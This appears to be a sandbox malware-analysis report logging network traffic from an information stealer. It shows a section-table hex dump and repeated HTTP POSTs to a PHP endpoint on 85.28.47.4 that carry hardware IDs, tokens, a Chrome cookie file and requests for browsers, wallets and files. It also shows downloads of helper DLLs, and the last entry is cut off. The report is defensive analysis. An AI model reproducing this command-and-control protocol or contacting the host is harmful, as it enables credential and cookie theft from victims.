0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 7a 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 f0 22 00 00 c0 9d 00 00 ec 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 30 30 34 37 42 42 42 30 42 38 33 39 34 36 30 39 38 34 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="hwid"F10047BBB0B83946098432------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build"default------GCGCFCBAKKFBFIECAEBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHDHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 2d 2d 0d 0a Data Ascii: ------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="message"browsers------HJDAFIEHIEGDHIDGDGHD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGDHCFCAAECAKECBAFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 2d 2d 0d 0a Data Ascii: ------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="message"plugins------JKEGDHCFCAAECAKECBAF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="message"fplugins------FIIDBKJJDGHDHJKEHJDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 85.28.47.4Content-Length: 6483Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 
56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file"------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file"------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="file"------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="file"------JEBKECAFIDAFIECBKEHD--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAKHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 2d 2d 0d 0a Data Ascii: ------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="message"wallets------IEHJDGIDBAAFIDGCGCAK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"files------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 32 33 30 35 65 62 35 32 62 61 35 62 63 64 39 32 37 37 35 38 30 38 34 63 63 37 62 33 62 63 65 63 36 66 31 63 39 31 33 32 32 65 66 32 65 64 62 63 32 35 37 62 34 39 38 35 31 30 35 62 30 34 39 36 35 34 30 35 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"6e2305eb52ba5bcd927758084cc7b3bcec6f1c91322ef2edbc257b4985105b0496540514------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; 